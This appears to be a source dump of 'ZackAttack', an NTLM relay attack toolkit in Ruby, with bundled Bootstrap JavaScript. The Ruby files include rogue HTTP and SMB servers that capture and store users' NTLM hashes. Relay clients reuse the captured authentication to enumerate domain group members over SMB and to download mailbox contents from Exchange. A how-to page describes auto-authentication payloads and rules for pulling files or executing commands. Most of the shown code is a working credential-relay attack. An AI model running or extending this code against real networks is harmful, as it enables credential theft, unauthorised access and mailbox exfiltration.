' 96 | }) 97 | 98 | }(window.jQuery); -------------------------------------------------------------------------------- /lib/zfadmingui.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | #encoding: ASCII-8BIT 3 | require 'rubygems' 4 | require 'webrick' 5 | require 'erb' 6 | require 'config' 7 | 8 | module ZFadmingui 9 | attr_accessor :server 10 | def self.Header 11 | return ERB.new(File.read('./bootstrap/header.erb')).result(binding) 12 | end 13 | def self.Leftbar 14 | return ERB.new(File.read('./bootstrap/leftbar.erb')).result(binding) 15 | end 16 | def self.Footer 17 | return ERB.new(File.read('./bootstrap/footer.erb')).result(binding) 18 | end 19 | class Http 20 | class ZFweb3 < WEBrick::HTTPServlet::ERBHandler 21 | def do_GET(req, resp) 22 | do_POST(req,resp) 23 | end 24 | def do_POST(req, resp) 25 | WEBrick::HTTPAuth.basic_auth(req, resp, "ZackATTACK") {|user, pass| 26 | user == MGMTUser && pass == MGMTPass 27 | } 28 | 29 | if req.path == "/" then 30 | resp.status = 302 31 | resp['Location'] = "http://" + req.host + ":" + "4531" +"/index" 32 | elsif File.exists?('bootstrap' + req.path + '.erb') then 33 | @script_filename = "./bootstrap" + req.path + '.erb' 34 | else 35 | @script_filename = "./bootstrap" + '/404.erb' 36 | end 37 | super 38 | if req.query["dl"] == "1" then 39 | resp['Content-Type'] = "application/force-download" 40 | if (req.query["dlname"] != nil) then 41 | resp['Content-Disposition'] = "attachment; filename=\"" + req.query["dlname"] + "\"" 42 | end 43 | else 44 | resp['Content-Type'] = "text/html" 45 | end 46 | end 47 | end 48 | class ZFwebapi < WEBrick::HTTPServlet::AbstractServlet 49 | def do_GET(req, resp) 50 | WEBrick::HTTPAuth.basic_auth(req, resp, "ZackATTACK") {|user, pass| 51 | user == APIUser && pass == APIPass 52 | } 53 | resp['Content-Type'] = "text/html" 54 | 55 | if req.query["a"] == "type2" then 56 | require 'zfdb' 57 | zfdb = ZFdb::DB.new() 58 | domain = req.query["d"] 59 | username = req.query["u"] 60 | type2 = req.query["msg"] 61 | reqid = zfdb.AddApiReq(username,domain,type2) 62 | type3msg = zfdb.WaitForApiResp(reqid,15)[0] 63 | resp.body = type3msg 64 | end 65 | end 66 | def do_POST(req,resp) 67 | self.do_GET(req,resp) 68 | end 69 | end 70 | def initialize (ip, port) 71 | begin 72 | @s = WEBrick::HTTPServer.new(:BindAddress => ip, :Port => port, :AccessLog => [], :Logger => WEBrick::Log::new("/dev/null", 7)) 73 | rescue Errno::EADDRINUSE, Errno::EACCES 74 | puts "ADMIN HTTP - PORT IN USE OR PERMS" 75 | return false 76 | end 77 | end 78 | def start() 79 | puts "Starting Admin GUI" 80 | @s.mount("/static",WEBrick::HTTPServlet::FileHandler,"./bootstrap") 81 | @s.mount("/api",ZFwebapi) 82 | @s.mount("/",ZFweb3,"./bootstrap/index.erb") 83 | trap("INT"){ 84 | @s.shutdown 85 | } 86 | puts "\n===========================================================" 87 | puts " WELCOME TO ZackAttack! - Version 0.a.lessfail." 88 | puts " Less Bugs than..er...a version ago!" 89 | puts " No CLI Gui for Now. Connect to http://" + MGMTUser + ":" + MGMTPass + "@" + MGMTIP + ":" + MGMTPort 90 | puts "===========================================================" 91 | @s.start 92 | end 93 | end 94 | end 95 | -------------------------------------------------------------------------------- /lib/zfhttpd.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby1.8 2 | #encoding: ASCII-8BIT 3 | require 'rubygems' 4 | require 'webrick' 5 | require 'base64' 6 | require 'zfntlm' 7 | require 'zfclient' 8 | =begin 9 | notes: need to track by IP since im guessing wpad won't track cookies 10 | will redir keep authing? let's find out! 11 | =end 12 | 13 | module ZFhttpd 14 | class Server 15 | def initialize (ip, port) 16 | begin 17 | @server = TCPServer.open(ip, port) 18 | rescue Errno::EADDRINUSE, Errno::EACCES 19 | puts "HTTP - PORT IN USE OR PERMS" 20 | return false 21 | end 22 | end 23 | def start 24 | puts "Starting httpd server" 25 | zfdb = ZFdb::DB.new 26 | loop { 27 | Thread.start(@server.accept) do |cli| 28 | uid = sessid = clientconn = nil 29 | begin 30 | # cli = @server.accept #make sure you recomment dumbass 31 | print "NEW HTTPd CONNECTION [ " 32 | print cli.peeraddr[3] 33 | puts " ]!" 34 | count = 1 35 | request = WEBrick::HTTPRequest.new(WEBrick::Config::HTTP) 36 | while (request.parse(cli)) 37 | #print "Request: " 38 | #puts request.request_uri 39 | #puts request['User-Agent'] 40 | response = WEBrick::HTTPResponse.new(WEBrick::Config::HTTP) 41 | response.content_type = "text/html" 42 | if (request['Authorization']) then 43 | ntlmdata = Base64.decode64(request['Authorization'][/NTLM (.*)/ , 1].strip) 44 | 45 | if (ntlmdata[8..11] == "\x01\x00\x00\x00") 46 | response.status = 401 47 | ntlmmsg = ZFNtlm::Message.new() 48 | if uid == nil then 49 | puts "FIRST TIMER!" 50 | @type1 = ntlmdata 51 | response['WWW-Authenticate'] = "NTLM " + Base64.encode64(ntlmmsg.buildtype2).gsub("\n",'') 52 | else 53 | begin 54 | clientconn = ZFClient::Router.new(uid,15) 55 | response['WWW-Authenticate'] = 'NTLM ' + Base64.encode64(clientconn.sendtype1(ntlmdata)).gsub("\n",'') 56 | rescue 57 | puts $! 58 | end 59 | end 60 | 61 | elsif (ntlmdata[8..11] == "\x03\x00\x00\x00") 62 | ntlmmsg = ZFNtlm::Message.new(ntlmdata) 63 | ntlmmsg.parsetype3 64 | if uid == nil then 65 | puts "HTTP user: " + ntlmmsg.domain + "\\" + ntlmmsg.username 66 | uid = zfdb.Getuserid(ntlmmsg.username,ntlmmsg.domain) 67 | sessid = zfdb.Newsession(uid,ntlmmsg.hostname,0,cli.peeraddr[3],2,request.host + request.unparsed_uri) 68 | zfdb.StoreHash(uid,ntlmmsg.lmhash,ntlmmsg.ntlmhash,"1122334455667788",sessid,Base64.encode64(ntlmdata)) 69 | else 70 | Thread.start{clientconn.sendtype3(ntlmdata)} 71 | end 72 | 73 | response.status = 302 74 | count = count + 1 75 | 76 | # TODO: DO TYPE 3 STUFF!!!! 77 | 78 | response['Location'] = "http://" + request.host + "/?id=" + count.to_s 79 | 80 | else 81 | puts "else else" 82 | end 83 | else 84 | #puts request['User-Agent'] 85 | response['WWW-Authenticate'] = "NTLM" 86 | #puts "other else" 87 | response.status = 401 88 | end 89 | #puts "sending!" 90 | response['Connection'] = "Keep-Alive" 91 | response['Keep-Alive'] = "timeout=5" 92 | response.send_response(cli) 93 | request = WEBrick::HTTPRequest.new(WEBrick::Config::HTTP) 94 | end 95 | rescue 96 | zfdb.Endsession(sessid) 97 | puts "Session Died for " + uid.to_s + " after " + count.to_s + " times" 98 | end 99 | end 100 | } # 101 | 102 | end # 103 | def close() 104 | @server.close 105 | end 106 | end 107 | end -------------------------------------------------------------------------------- /lib/zfsmbd.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | #encoding: ASCII-8BIT 3 | require 'zfmoduletest' 4 | require 'zfntlm' 5 | require 'zfclient' 6 | require 'zfdb' 7 | module ZFsmb 8 | 9 | class Server 10 | 11 | attr_accessor :server 12 | 13 | def initialize (ipaddr) 14 | begin 15 | @server = TCPServer.open(ipaddr , 445) 16 | return @server 17 | rescue Errno::EADDRINUSE, Errno::EACCES 18 | puts "SMB - PORT IN USE OR PERMS" 19 | return false 20 | end 21 | end 22 | 23 | def start 24 | puts "Starting smbd server" 25 | zfdb = ZFdb::DB.new 26 | loop { 27 | Thread.start(@server.accept) do |cli| 28 | # TODO: Catch when connect 29 | #To Break threading for dev 30 | #cli = @server.accept 31 | # 32 | 33 | puts "NEW SMBd CONNECTION [ " + cli.peeraddr[3] + " ]" 34 | uid = sessid = clientconn = nil # to define context of variable 35 | count = 1 #debuging count :p 36 | begin 37 | loop { 38 | 39 | q, x = cli.recvfrom(2000) 40 | req = Client.new(q) 41 | 42 | if (req.smbcmd == "\x72") then # SMBNEGO 43 | resp = SmbNegProtoRespa.new(q) 44 | cli.write(resp.getpacket) 45 | 46 | elsif (req.smbcmd == "\x73") then # SetupAndX / SPNEGO TIME! 47 | ntlmreq = ZFsmb::Parsentlmfromspnego(req.bdata) 48 | ntlmmsg = ZFNtlm::Message.new(ntlmreq) 49 | 50 | if ntlmmsg.type == 1 then # if type 1 send type2 51 | a = ZFNtlm::Message.new() 52 | if uid == nil then 53 | resp = SetupAndXResp.new(q,ZFsmb::Buildtype2gssapi(a.buildtype2)) 54 | else 55 | clientconn = ZFClient::Router.new(uid,7) 56 | resp = SetupAndXResp.new(q,ZFsmb::Buildtype2gssapi(clientconn.sendtype1(ntlmreq))) 57 | end 58 | resp.smbstatus = "\x16\x00\x00\xc0" 59 | cli.write(resp.getpacket) 60 | 61 | elsif ntlmmsg.type == 3 then #if type 3 send OK 62 | # TODO: GET NTLM data and relay it! 63 | ntlmmsg.parsetype3 64 | if uid == nil then 65 | puts "SMB user: " + ntlmmsg.domain + "\\" + ntlmmsg.username 66 | uid = zfdb.Getuserid(ntlmmsg.username,ntlmmsg.domain) 67 | sessid = zfdb.Newsession(uid,ntlmmsg.hostname,0,cli.peeraddr[3],1,"\IPC$") 68 | zfdb.StoreHash(uid,ntlmmsg.lmhash,ntlmmsg.ntlmhash,"1122334455667788",sessid,Base64.encode64(ntlmreq)) 69 | 70 | else 71 | #puts "Passing type3" 72 | #zftest 73 | pos = q.index(/\x4e\x54\x4c\x4d\x53\x53\x50/) 74 | if q[pos-3,1] == "\x82" then len = q[pos-2,2].unpack("n")[0] 75 | else len = q[pos-1,1].unpack("C")[0] 76 | end 77 | signdata = q[pos+len,20] 78 | 79 | #zftest 80 | Thread.start{clientconn.sendtype3(ntlmreq,q)} 81 | end 82 | resp = SetupAndXResp.new(q,"\xa1\x07\x30\x05\xa0\x03\x0a\x01\x00") 83 | count = count + 1 84 | cli.write(resp.getpacket) 85 | 86 | else 87 | puts "shit's fucked up" 88 | end 89 | elsif (req.smbcmd == "\x75") then # TreeConnectAndX 90 | 91 | path = q[/(\x5c\x00\x5c\x00.*\x00\x00)/].unpack("M*")[0].gsub("\x00","") # lazy detection of file share 92 | begin 93 | #TODO: detect if IPC$ and don't log it. 94 | if !(path.include? "IPC$") then 95 | zfdb.Setsessionpath(sessid,path) 96 | end 97 | rescue 98 | puts $! 99 | end 100 | resp = SMBReauth.new(q) 101 | cli.write(resp.getpacket) 102 | 103 | else 104 | puts "unnknown! - " + [req.smbcmd].unpack("H*") 105 | #puts "unknown!" 106 | end 107 | } 108 | rescue 109 | zfdb.Endsession(sessid) 110 | puts "Session Died for " + uid 111 | end 112 | end 113 | } 114 | # 115 | #Comment one to get rid of threading 116 | # 117 | end 118 | end 119 | end -------------------------------------------------------------------------------- /bootstrap/101.erb: -------------------------------------------------------------------------------- 1 | 2 | <%=ZFadmingui.Header%> 3 |
4 | 5 |

Getting Started!

6 |

We're going to assume you know what NTLM relaying is. You don't? Then GTFO and RTFM. Seriously. This is a tool. Not a replacement for intelligence.

7 |

First thing's first. Make sure you have permission to test this against the users and targets. Don't be stupid. And Don't Fuck This Up.

8 |

Next: The tool is broken into 4 main components

9 |

Servers

10 |

The Servers are the HTTP and SMB servers that perform the following:

11 |
  • Act as a rogue server just accepting NTLM authentication.
  • Identify who the user is with 100% certianty to fuel the rules
  • Serve up the relayed Type2 msgs and route the Type3 Messages as requested.
  • Wait till a type 2 message is in the list to be passed or keep the user on "hold" till timeout.
  • If timeout is reached, send a static 112233... type2 message
  • Keep the client re-authenticating as much as possible.
12 |

But we need more than just the servers obviously. We need ways to make the user's auto authenticate to us to get creds, thus we have...

13 |

Auth Payloads

14 |

Auth Payloads are the various ways to get clients to auto-authenticate to us using windows integrated authentication. Examples include html files, word docs, desktop.ini, emails, etc. If a payload can not be automatically generated, instructions are included on how to perform the attack to get the authentication requests.

15 |

So we have users authing to us, what we need next are..

16 |

Clients

17 |

The Clients are exactly what they sound like - clients that support NTLM relaying. These clients leverage the authenticating users connecting to the servers to connect to other servers instead.

18 |

Some clients are request driven, but we want some things auto performed, which leads us to....

19 |

Attack Rules

20 |

In order to auto-perform some acctions against a subset of some targets and other actions against another subset, rules can be written to auto perform when a user connects to the rogue server.

21 |

OK, so I get the parts, Now what?

22 |

Next step is to create rules. The rules comprise of a few parts. Keep with me here :)....

23 |

Users

24 |

They are obvious. They're identified by Domain name and User Name in conjunction of each other. The database automatically creates a uid for them, but the uid isn't of your concern. It's a linker.

25 |

User Groups

26 |

Many Users can belong to many user groups. Easy enough. Create groups for your domain users, domain admins, etc.

27 |

Targets

28 |

Targets are the systems you want to automatically attack. Populate them by IP (only ip works for now, dns name later)

29 |

Target Groups

30 |

Same as users, but for targets. Many targets can belong to many target groups. Create a group of sysadmin workstations, file servers, etc.

31 |

ZackAttack! RULES!

32 |

Of course it does, but i'm talking about the rule sets. After you define the targets and target groups and assign some users to groups, you can create rules. Rules follow very simple logic:

33 |

When you see a user that belongs to USER GROUP,
then connect to a target in TARGET GROUP
with this MODULE (i.e. smb/http/ldap/mssql)
and perform these MODULE ACTIONS (download emails/pull files/execute commands/etc.).
Optionally repeat for ALL USERS in the users group (in scenarious like email with individual access)
or ALL TARGETS in the target group (in the case of multiple servers you want shell)


34 |

make sense? good. i tried to make sure you could wrap your head arround it.

35 | 36 |

This HOWTO is really light....

37 |

I'll be writing much more soon. Wan't to get this pushed out as fast as possible. Hugs and kisses. xo xo. Less than threes with semicolon asterisks.

38 | 39 |
40 | <%=ZFadmingui.Footer%> -------------------------------------------------------------------------------- /clients/smb.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | #encoding: ASCII-8BIT 3 | require 'zfmoduletest' 4 | require 'zfdb' 5 | 6 | module ZFClient 7 | class Smb 8 | def initialize (server,port) 9 | @db = ZFdb::DB.new 10 | @server = server 11 | @s = TCPSocket.open(server,port) 12 | ZFsmb::Smbclientnego(@s) 13 | @q, x = @s.recvfrom(2000) 14 | end 15 | 16 | def sendtype1(type1msg) 17 | ZFsmb::Smbclientntlmnego(@s, 1, type1msg, "\x00\x00") 18 | q, x = @s.recvfrom(2000) 19 | temp = ZFsmb::Client.new(q) 20 | @uid = temp.smbuid 21 | msgresp = ZFsmb::Parsentlmfromspnego(q) 22 | a = ZFNtlm::Message.new() 23 | 24 | return msgresp 25 | end 26 | 27 | def sendtype3(type3msg,rawpkt=nil,items=nil) 28 | ZFsmb::Smbclientntlmnego(@s, 3, type3msg, @uid, rawpkt) 29 | q, x = @s.recvfrom(2000) 30 | actions = @db.GetActionItems(items["aid"]) 31 | actions.each do |act| 32 | if act[3] == 2 then 33 | puts "Not Yet Supported, but coming very soon :(" 34 | elsif act[3] == 1 then 35 | puts "enum users from group" 36 | group = (eval act[4])["group"] 37 | @s.write(ZFsmb::SmbTreeConnectAndX.new(@uid).getpacket) 38 | q, x = @s.recvfrom(2000) 39 | # TODO: Parse TREEID From Response! 40 | @s.write(ZFsmb::SmbNTCreateAndX.new(@uid).getpacket) 41 | q, x = @s.recvfrom(2000) 42 | f3 = ZFsmb::SMBTransDCEBind.new(1) 43 | fid = q[42,2] 44 | f3.setfid(fid) 45 | @s.write(f3.getpacket) 46 | q, x = @s.recvfrom(2000) 47 | @s.write(ZFsmb::LsaOpenPolicy.new(fid).getpacket) 48 | q, x = @s.recvfrom(2000) 49 | handle = ZFsmb.Parsehandle(q) 50 | f5 = ZFsmb::LsaQueryInfoPolicy.new(handle, fid) 51 | @s.write(f5.getpacket) 52 | q, x = @s.recvfrom(2000) 53 | sid = ZFsmb::ParsesidFromLSA(q) 54 | f = ZFsmb::LsaClose.new(handle, fid) 55 | @s.write(f.getpacket) 56 | q, x = @s.recvfrom(2000) 57 | f = ZFsmb::SMBClose.new(fid,@uid) 58 | @s.write(f.getpacket) 59 | q, x = @s.recvfrom(2000) 60 | f = ZFsmb::SmbNTCreateAndX.new(@uid,"\\samr") 61 | @s.write(f.getpacket) 62 | q, x = @s.recvfrom(2000) 63 | fid = q[42,2] 64 | f3 = ZFsmb::SMBTransDCEBind.new(2) 65 | f3.setfid(fid) 66 | @s.write(f3.getpacket) 67 | q, x = @s.recvfrom(2000) 68 | f = ZFsmb::SamrConnect.new(@server,fid) 69 | @s.write(f.getpacket) 70 | q, x = @s.recvfrom(2000) 71 | handle = ZFsmb.Parsehandle(q) 72 | f = ZFsmb::SamrOpenDomain.new(handle, fid, sid) 73 | @s.write(f.getpacket) 74 | q, x = @s.recvfrom(2000) 75 | handle2 = ZFsmb.Parsehandle(q) 76 | f = ZFsmb::SamrLookupNames.new(handle2, fid, group) 77 | @s.write(f.getpacket) 78 | q, x = @s.recvfrom(2000) 79 | if q[q.length-4,4] == "\x73\x00\x00\xc0" then 80 | @s.write(ZFsmb::SamrClose.new(handle2, fid).getpacket) 81 | q, x = @s.recvfrom(2000) 82 | sid = "\x01\x01\x00\x00\x00\x00\x00\x05\x20\x00\x00\x00" 83 | f = ZFsmb::SamrOpenDomain.new(handle, fid, sid) 84 | @s.write(f.getpacket) 85 | q2, x = @s.recvfrom(2000) 86 | handle2 = ZFsmb.Parsehandle(q2) 87 | f = ZFsmb::SamrLookupNames.new(handle2, fid, group) 88 | @s.write(f.getpacket) 89 | q, x = @s.recvfrom(2000) 90 | if q[q.length-4,4] != "\x00\x00\x00\x00" then 91 | puts "shits fucked up" 92 | end 93 | elsif q[q.length-4,4] != "\x00\x00\x00\x00" then 94 | puts "crap" 95 | end 96 | rid = ZFsmb.ParseSamrLookup(q) 97 | #rid="\x20\x02\x00\x00" #TODO parse out later 98 | f = ZFsmb::SamrOpenAlias.new(handle2, fid, rid) 99 | @s.write(f.getpacket) 100 | q, x = @s.recvfrom(2000) 101 | aliashandle = ZFsmb.Parsehandle(q) 102 | f = ZFsmb::SamrGetMembersInAlias.new(aliashandle, fid) 103 | @s.write(f.getpacket) 104 | q, x = @s.recvfrom(2000) 105 | wtf = ZFsmb.ParseGetMembersInAlias(q) 106 | #TODO parse sids 107 | @s.write(ZFsmb::SmbNTCreateAndX.new(@uid).getpacket) 108 | q, x = @s.recvfrom(2000) 109 | f3 = ZFsmb::SMBTransDCEBind.new(1) 110 | fid2 = q[42,2] 111 | f3.setfid(fid2) 112 | @s.write(f3.getpacket) 113 | q, x = @s.recvfrom(2000) 114 | @s.write(ZFsmb::LsaOpenPolicy.new(fid2).getpacket) 115 | q, x = @s.recvfrom(2000) 116 | lsahandle = ZFsmb.Parsehandle(q) 117 | f = ZFsmb::LsaLookupSids.new(lsahandle, fid2, wtf) 118 | @s.write(f.getpacket) 119 | q, x = @s.recvfrom(2000) 120 | ZFsmb.Parselookupsid(q, wtf) 121 | @s.write(ZFsmb::SMBClose.new(fid2,@uid).getpacket) 122 | q, x = @s.recvfrom(2000) 123 | @s.write(ZFsmb::SMBClose.new(fid,@uid).getpacket) 124 | q, x = @s.recvfrom(2000) 125 | else 126 | puts "unknown smb" 127 | end 128 | 129 | end 130 | end 131 | end 132 | end -------------------------------------------------------------------------------- /bootstrap/users.erb: -------------------------------------------------------------------------------- 1 | <% 2 | db = ZFdb::DB.new() 3 | if servlet_request.query["action"] == "group" then 4 | if !(servlet_request.query["group"]=="") then db.GetGroupID(servlet_request.query["group"]) end 5 | elsif servlet_request.query["action"] == "user" then 6 | if !(servlet_request.query["user"]=="") then db.Getuserid(servlet_request.query["user"],servlet_request.query["domain"]) end 7 | elsif servlet_request.query["action"] == "addutog" then 8 | if !(servlet_request.query["group"]=="") then 9 | gid = db.GetGroupID(servlet_request.query["group"]) 10 | db.AddUserToGroup(servlet_request.query["uid"],gid) 11 | end 12 | elsif servlet_request.query["action"] == "delufromg" then 13 | db.DelUserFromGroup(servlet_request.query["duid"],servlet_request.query["dgid"]) 14 | end 15 | #delufromg 16 | #catch nulls 17 | %> 18 | <%=ZFadmingui.Header%> 19 | 20 |
21 | <%=ZFadmingui.Leftbar%> 22 |
23 |
24 |
25 |
26 |

Users Discovered:


27 |
28 | 29 | \ 30 | 31 |
32 | 33 | 34 | 35 | 36 | 37 | <%udb = db.GetUsers 38 | udb.each do |result| 39 | if result[2] == "" then result[2] = "WORKGROUP" end 40 | %> 41 | 42 | <%end%> 43 | 44 |
uIDuserNameLast SeenLast SourceMethodPath
<%=result[0]%><%=result[2]%>\<%=result[1]%><%=result[4]%><%=result[5]%><%= if result[6]==1 then "SMB" elsif result[6]==2 then "HTTP" else "Unknown" end%><%=result[7]%>Add To Group
45 |
46 |
47 |
48 |
49 |

Groups:


50 |
51 | 52 | 53 |
54 | 55 | 56 | 57 | 58 | 59 | 60 | <%gdb = db.GetGroups 61 | gdb.each do |result| %> 62 | 63 | <%end%> 64 | 65 |
gIDgroupNamemembers
<%=result[0]%><%=result[1]%><%db.GetGroupMembers(result[0]).each do |inf|%><%if !(inf[1]==nil) then%><%=inf[2]%>\<%=inf[1]%> delete
<%end end%>
66 |
67 |
68 | 69 |
70 | 91 | 92 | 93 | 110 | <%=ZFadmingui.Footer%> -------------------------------------------------------------------------------- /clients/ews.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | #encoding: ASCII-8BIT 3 | =begin 4 | exchange web services client 5 | =end 6 | require 'net/http' 7 | require 'net/https' 8 | require 'base64' 9 | require 'zfdb' 10 | #TODO: Fix below so there's not a 1 or 2. For some reason .gsub("CHANGEME",folder) wasn't working 11 | Ews_id_query1 = ' 12 | 13 | 14 | 15 | 16 | IdOnly 17 | 18 | 19 | 21 | 22 | 23 | 24 | ' 25 | 26 | 27 | Info3 = ' 28 | 29 | 30 | 31 | 32 | Default 33 | true 34 | 35 | ' 36 | Info4 = ' 37 | 38 | 39 | ' 40 | 41 | module ZFClient 42 | class EWS 43 | def initialize (server,port) 44 | @db = ZFdb::DB.new 45 | @client = Net::HTTP.new(server, port) or return false 46 | if port == 443 then @client.use_ssl = true end 47 | @client.verify_mode = OpenSSL::SSL::VERIFY_NONE 48 | return @client.start 49 | 50 | end 51 | 52 | def connect 53 | 54 | end 55 | 56 | def sendtype1(type1msg) 57 | request = Net::HTTP::Post.new('/ews/Exchange.asmx') 58 | 59 | request['authorization'] = 'NTLM ' + Base64.encode64(type1msg).gsub("\n",'').strip 60 | request['Content-Length'] = '0' 61 | request['Content-Type'] = "text/xml" 62 | request['Connection'] = "Keep-Alive" 63 | begin response = @client.request(request) or return false end 64 | chal = response['www-authenticate'][/NTLM (.*)/ , 1].split(',')[0] 65 | 66 | return Base64.decode64(chal).gsub("\n",'') 67 | end 68 | 69 | def sendtype3(type3msg, rawpkt, items=nil) 70 | request = Net::HTTP::Post.new('/ews/Exchange.asmx') 71 | asdf = ZFNtlm::Message.new(type3msg) 72 | asdf.parsetype3() 73 | puts items.inspect 74 | actions = @db.GetActionItems(items["aid"]) 75 | # TODO change to just check if auth worked. 76 | request['Content-Type'] = "text/xml" 77 | request['Connection'] = "Keep-Alive" 78 | request['Authorization'] = 'NTLM ' + Base64.encode64(type3msg).gsub("\n",'').strip 79 | woof = Ews_id_query1 + "trash" + Ews_id_query2 80 | #woof.sub("CHANGEME","trash") 81 | request['Content-Length'] = woof.length 82 | request.body = woof 83 | response = @client.request(request) 84 | 85 | #TODO check auth status 86 | actions.each do |act| 87 | if act[3] == 1 then #get emails 88 | folder = (eval act[4])["folder"] 89 | body = Ews_id_query1 + folder + Ews_id_query2 90 | #puts body 91 | request = Net::HTTP::Post.new('/ews/Exchange.asmx') 92 | request['Content-Type'] = "text/xml" 93 | request['Connection'] = "Keep-Alive" 94 | request['Content-Length'] = body.length 95 | request.body = body 96 | puts request.body 97 | response = @client.request(request) 98 | 99 | request2 = Net::HTTP::Post.new('/ews/Exchange.asmx') 100 | request2['Content-Type'] = "text/xml" 101 | request2['Connection'] = "Keep-Alive" 102 | countdrac = 0 103 | io = File.open './results/ews-' + asdf.domain + "-" + asdf.username + '.txt', 'w' 104 | 105 | response.body.scan(/t:Message>(.*?)<\/t:Message/i) do |gophers| 106 | puts "Enumerating through previous obtained message IDs: " 107 | q = Info3.to_s + gophers[0].to_s() + Info4.to_s 108 | request2['Content-Length'] = q.length 109 | request2.body = q 110 | #puts gophers 111 | @client.request request2 do |res| 112 | countdrac = countdrac + 1 113 | puts countdrac 114 | io.write res.body 115 | end 116 | end 117 | elsif act[3] == 2 then # get calendar 118 | 119 | elsif act[3] == 3 then # get contacts 120 | 121 | else puts "unknown action for ews" 122 | end 123 | 124 | end 125 | return true 126 | end 127 | 128 | def execute 129 | 130 | end 131 | end 132 | end -------------------------------------------------------------------------------- /bootstrap/js/bootstrap-modal.js: -------------------------------------------------------------------------------- 1 | /* ========================================================= 2 | * bootstrap-modal.js v2.0.4 3 | * http://twitter.github.com/bootstrap/javascript.html#modals 4 | * ========================================================= 5 | * Copyright 2012 Twitter, Inc. 6 | * 7 | * Licensed under the Apache License, Version 2.0 (the "License"); 8 | * you may not use this file except in compliance with the License. 9 | * You may obtain a copy of the License at 10 | * 11 | * http://www.apache.org/licenses/LICENSE-2.0 12 | * 13 | * Unless required by applicable law or agreed to in writing, software 14 | * distributed under the License is distributed on an "AS IS" BASIS, 15 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 16 | * See the License for the specific language governing permissions and 17 | * limitations under the License. 18 | * ========================================================= */ 19 | 20 | 21 | !function ($) { 22 | 23 | "use strict"; // jshint ;_; 24 | 25 | 26 | /* MODAL CLASS DEFINITION 27 | * ====================== */ 28 | 29 | var Modal = function (content, options) { 30 | this.options = options 31 | this.$element = $(content) 32 | .delegate('[data-dismiss="modal"]', 'click.dismiss.modal', $.proxy(this.hide, this)) 33 | } 34 | 35 | Modal.prototype = { 36 | 37 | constructor: Modal 38 | 39 | , toggle: function () { 40 | return this[!this.isShown ? 'show' : 'hide']() 41 | } 42 | 43 | , show: function () { 44 | var that = this 45 | , e = $.Event('show') 46 | 47 | this.$element.trigger(e) 48 | 49 | if (this.isShown || e.isDefaultPrevented()) return 50 | 51 | $('body').addClass('modal-open') 52 | 53 | this.isShown = true 54 | 55 | escape.call(this) 56 | backdrop.call(this, function () { 57 | var transition = $.support.transition && that.$element.hasClass('fade') 58 | 59 | if (!that.$element.parent().length) { 60 | that.$element.appendTo(document.body) //don't move modals dom position 61 | } 62 | 63 | that.$element 64 | .show() 65 | 66 | if (transition) { 67 | that.$element[0].offsetWidth // force reflow 68 | } 69 | 70 | that.$element.addClass('in') 71 | 72 | transition ? 73 | that.$element.one($.support.transition.end, function () { that.$element.trigger('shown') }) : 74 | that.$element.trigger('shown') 75 | 76 | }) 77 | } 78 | 79 | , hide: function (e) { 80 | e && e.preventDefault() 81 | 82 | var that = this 83 | 84 | e = $.Event('hide') 85 | 86 | this.$element.trigger(e) 87 | 88 | if (!this.isShown || e.isDefaultPrevented()) return 89 | 90 | this.isShown = false 91 | 92 | $('body').removeClass('modal-open') 93 | 94 | escape.call(this) 95 | 96 | this.$element.removeClass('in') 97 | 98 | $.support.transition && this.$element.hasClass('fade') ? 99 | hideWithTransition.call(this) : 100 | hideModal.call(this) 101 | } 102 | 103 | } 104 | 105 | 106 | /* MODAL PRIVATE METHODS 107 | * ===================== */ 108 | 109 | function hideWithTransition() { 110 | var that = this 111 | , timeout = setTimeout(function () { 112 | that.$element.off($.support.transition.end) 113 | hideModal.call(that) 114 | }, 500) 115 | 116 | this.$element.one($.support.transition.end, function () { 117 | clearTimeout(timeout) 118 | hideModal.call(that) 119 | }) 120 | } 121 | 122 | function hideModal(that) { 123 | this.$element 124 | .hide() 125 | .trigger('hidden') 126 | 127 | backdrop.call(this) 128 | } 129 | 130 | function backdrop(callback) { 131 | var that = this 132 | , animate = this.$element.hasClass('fade') ? 'fade' : '' 133 | 134 | if (this.isShown && this.options.backdrop) { 135 | var doAnimate = $.support.transition && animate 136 | 137 | this.$backdrop = $('
') 138 | .appendTo(document.body) 139 | 140 | if (this.options.backdrop != 'static') { 141 | this.$backdrop.click($.proxy(this.hide, this)) 142 | } 143 | 144 | if (doAnimate) this.$backdrop[0].offsetWidth // force reflow 145 | 146 | this.$backdrop.addClass('in') 147 | 148 | doAnimate ? 149 | this.$backdrop.one($.support.transition.end, callback) : 150 | callback() 151 | 152 | } else if (!this.isShown && this.$backdrop) { 153 | this.$backdrop.removeClass('in') 154 | 155 | $.support.transition && this.$element.hasClass('fade')? 156 | this.$backdrop.one($.support.transition.end, $.proxy(removeBackdrop, this)) : 157 | removeBackdrop.call(this) 158 | 159 | } else if (callback) { 160 | callback() 161 | } 162 | } 163 | 164 | function removeBackdrop() { 165 | this.$backdrop.remove() 166 | this.$backdrop = null 167 | } 168 | 169 | function escape() { 170 | var that = this 171 | if (this.isShown && this.options.keyboard) { 172 | $(document).on('keyup.dismiss.modal', function ( e ) { 173 | e.which == 27 && that.hide() 174 | }) 175 | } else if (!this.isShown) { 176 | $(document).off('keyup.dismiss.modal') 177 | } 178 | } 179 | 180 | 181 | /* MODAL PLUGIN DEFINITION 182 | * ======================= */ 183 | 184 | $.fn.modal = function (option) { 185 | return this.each(function () { 186 | var $this = $(this) 187 | , data = $this.data('modal') 188 | , options = $.extend({}, $.fn.modal.defaults, $this.data(), typeof option == 'object' && option) 189 | if (!data) $this.data('modal', (data = new Modal(this, options))) 190 | if (typeof option == 'string') data[option]() 191 | else if (options.show) data.show() 192 | }) 193 | } 194 | 195 | $.fn.modal.defaults = { 196 | backdrop: true 197 | , keyboard: true 198 | , show: true 199 | } 200 | 201 | $.fn.modal.Constructor = Modal 202 | 203 | 204 | /* MODAL DATA-API 205 | * ============== */ 206 | 207 | $(function () { 208 | $('body').on('click.modal.data-api', '[data-toggle="modal"]', function ( e ) { 209 | var $this = $(this), href 210 | , $target = $($this.attr('data-target') || (href = $this.attr('href')) && href.replace(/.*(?=#[^\s]+$)/, '')) //strip for ie7 211 | , option = 